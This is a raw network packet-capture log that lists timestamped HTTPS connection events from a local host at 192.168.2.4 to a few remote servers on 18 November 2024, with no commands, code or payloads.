                                          Nov 18, 2024 23:45:06.616822958 CET57421443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.616858959 CET4435742113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.616952896 CET57421443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.617105007 CET57421443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.617121935 CET4435742113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.720467091 CET4435741713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.720638037 CET4435741713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.720807076 CET57417443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.720807076 CET57417443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.720807076 CET57417443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.723316908 CET57422443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.723345995 CET4435742213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.723417044 CET57422443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.723532915 CET57422443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.723546982 CET4435742213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.786817074 CET57353443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:45:06.786875963 CET44357353142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:45:06.908550024 CET4435741813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.909466028 CET57418443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.909533024 CET4435741813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.910063982 CET57418443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.910082102 CET4435741813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.035304070 CET57417443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.035326958 CET4435741713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.186837912 CET4435741813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.186901093 CET4435741813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.187109947 CET57418443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.187249899 CET57418443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.187295914 CET4435741813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.187350035 CET57418443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.187367916 CET4435741813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.189249992 CET4435741913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.189719915 CET57419443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.189734936 CET4435741913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.190181971 CET57419443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.190185070 CET4435741913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.190762997 CET57423443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.190793037 CET4435742313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.190871954 CET57423443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.191015959 CET57423443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.191024065 CET4435742313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.322210073 CET4435741913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.322319984 CET4435741913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.322518110 CET57419443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.322597980 CET57419443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.322607994 CET4435741913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.322617054 CET57419443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.322621107 CET4435741913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.325767040 CET57424443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.325782061 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.325869083 CET57424443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.326069117 CET57424443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.326078892 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.328078032 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.328468084 CET57420443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.328502893 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.329041958 CET57420443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.329047918 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.399576902 CET4435742113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.400130987 CET57421443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.400157928 CET4435742113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.400722027 CET57421443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.400727987 CET4435742113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.477410078 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.477478981 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.477538109 CET57420443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.477555037 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.477585077 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.477736950 CET57420443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.477807045 CET57420443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.477823019 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.477840900 CET57420443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.477847099 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.479291916 CET4435742213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.479707003 CET57422443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.479722977 CET4435742213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.480284929 CET57422443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.480290890 CET4435742213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.480827093 CET57425443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.480911016 CET4435742513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.480994940 CET57425443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.481110096 CET57425443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.481136084 CET4435742513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.557904959 CET4435742113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.558080912 CET4435742113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.558278084 CET57421443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.558278084 CET57421443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.558278084 CET57421443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.561306953 CET57426443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.561330080 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.561429977 CET57426443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.561585903 CET57426443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.561597109 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.613373995 CET4435742213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.613538027 CET4435742213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.613609076 CET57422443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.613729954 CET57422443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.613750935 CET4435742213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.613760948 CET57422443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.613766909 CET4435742213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.616902113 CET57427443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.617007971 CET4435742713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.617108107 CET57427443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.617279053 CET57427443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.617335081 CET4435742713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.862961054 CET57421443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.862979889 CET4435742113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.938118935 CET4435742313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.938525915 CET57423443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.938544989 CET4435742313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:07.938972950 CET57423443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:07.938980103 CET4435742313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.071465969 CET4435742313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.071664095 CET4435742313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.071762085 CET57423443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.071819067 CET57423443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.071830988 CET4435742313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.071845055 CET57423443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.071851969 CET4435742313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.074400902 CET57428443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.074419975 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.074507952 CET57428443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.074656963 CET57428443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.074666023 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.083981991 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.084316969 CET57424443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.084331989 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.084841967 CET57424443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.084846973 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.217325926 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.217375040 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.217421055 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.217573881 CET57424443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.217573881 CET57424443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.217628956 CET57424443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.217638016 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.217674017 CET57424443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.217679024 CET4435742413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.219742060 CET57429443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.219777107 CET4435742913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.219850063 CET57429443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.219989061 CET57429443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.220002890 CET4435742913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.238641024 CET4435742513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.239080906 CET57425443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.239152908 CET4435742513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.239350080 CET57425443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.239367008 CET4435742513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.304136038 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.304769993 CET57426443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.304780006 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.305186987 CET57426443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.305191040 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.370117903 CET4435742513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.370261908 CET4435742513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.370383024 CET57425443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.370445013 CET57425443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.370475054 CET4435742513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.370521069 CET57425443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.370538950 CET4435742513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.373050928 CET57430443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.373080015 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.373162031 CET57430443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.373311996 CET57430443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.373327971 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.393723965 CET4435742713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.394058943 CET57427443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.394078970 CET4435742713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.394411087 CET57427443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.394423008 CET4435742713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.439477921 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.439547062 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.439615011 CET57426443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.439625025 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.439660072 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.439713955 CET57426443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.439769983 CET57426443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.439778090 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.439807892 CET57426443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.439811945 CET4435742613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.442029953 CET57431443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.442074060 CET4435743113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.442141056 CET57431443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.442239046 CET57431443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.442250967 CET4435743113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.529129982 CET4435742713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.529313087 CET4435742713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.529395103 CET57427443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.529467106 CET57427443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.529468060 CET57427443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.529494047 CET4435742713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.529515028 CET4435742713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.531399012 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.531435966 CET4435743213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.531498909 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.531609058 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.531625032 CET4435743213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.819726944 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.820130110 CET57428443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.820142031 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.820523024 CET57428443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.820528030 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.954382896 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.954421997 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.954472065 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.954494953 CET57428443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.954528093 CET57428443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.954751968 CET57428443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.954766989 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.954781055 CET57428443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.954787016 CET4435742813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.957551003 CET57433443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.957614899 CET4435743313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.957705975 CET57433443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.957874060 CET57433443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.957891941 CET4435743313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.992902040 CET4435742913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.993386030 CET57429443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.993417978 CET4435742913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:08.993813992 CET57429443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:08.993819952 CET4435742913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.112066031 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.112698078 CET57430443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.112735987 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.113354921 CET57430443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.113360882 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.152370930 CET4435742913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.152431965 CET4435742913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.152616024 CET57429443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.152647972 CET57429443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.152663946 CET4435742913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.152673006 CET57429443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.152678013 CET4435742913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.155589104 CET57434443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.155682087 CET4435743413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.155792952 CET57434443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.155920029 CET57434443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.155951977 CET4435743413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.185688972 CET4435743113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.186021090 CET57431443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.186029911 CET4435743113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.186551094 CET57431443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.186554909 CET4435743113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.240216970 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.240283966 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.240382910 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.240478039 CET57430443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.240566969 CET57430443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.240566969 CET57430443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.240581989 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.240592957 CET4435743013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.243248940 CET57435443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.243293047 CET4435743513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.243374109 CET57435443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.243508101 CET57435443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.243524075 CET4435743513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.285984039 CET4435743213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.286345005 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.286381960 CET4435743213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.286878109 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.286891937 CET4435743213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.320368052 CET4435743113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.320539951 CET4435743113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.320682049 CET57431443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.320705891 CET57431443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.320719004 CET4435743113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.320728064 CET57431443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.320732117 CET4435743113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.323474884 CET57436443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.323538065 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.323626995 CET57436443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.323771954 CET57436443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.323798895 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.427242041 CET4435743213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.427351952 CET4435743213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.427488089 CET4435743213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.427628040 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.427628994 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.427628994 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.427628994 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.430242062 CET57437443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.430319071 CET4435743713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.430402994 CET57437443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.430529118 CET57437443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.430546999 CET4435743713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.644121885 CET57432443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.644172907 CET4435743213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.708287001 CET4435743313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.708836079 CET57433443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.708900928 CET4435743313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.709461927 CET57433443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.709475040 CET4435743313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.848670959 CET4435743313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.848745108 CET4435743313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.848974943 CET57433443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.849009037 CET57433443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.849028111 CET4435743313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.849039078 CET57433443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.849046946 CET4435743313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.852214098 CET57438443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.852274895 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.852381945 CET57438443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.852535009 CET57438443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.852566004 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.909924030 CET4435743413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.910326004 CET57434443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.910389900 CET4435743413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.910949945 CET57434443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.910965919 CET4435743413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.997123957 CET4435743513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.997659922 CET57435443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.997690916 CET4435743513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:09.998240948 CET57435443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:09.998255014 CET4435743513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.039833069 CET4435743413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.039899111 CET4435743413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.040076971 CET57434443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.040154934 CET57434443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.040154934 CET57434443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.040184975 CET4435743413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.040206909 CET4435743413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.043132067 CET57439443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.043200970 CET4435743913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.043364048 CET57439443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.043498993 CET57439443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.043513060 CET4435743913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.061975956 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.062314987 CET57436443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.062361956 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.062836885 CET57436443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.062850952 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.149729967 CET4435743513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.151206017 CET4435743513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.151271105 CET57435443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.151305914 CET57435443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.151324034 CET4435743513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.151339054 CET57435443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.151344061 CET4435743513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.154241085 CET57440443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.154282093 CET4435744013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.154499054 CET57440443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.154499054 CET57440443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.154561043 CET4435744013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.191360950 CET4435743713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.191637993 CET57437443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.191684008 CET4435743713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.191981077 CET57437443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.191993952 CET4435743713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.194580078 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.194642067 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.194705009 CET57436443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.194735050 CET4435743613.107.246.45192.168.2.4
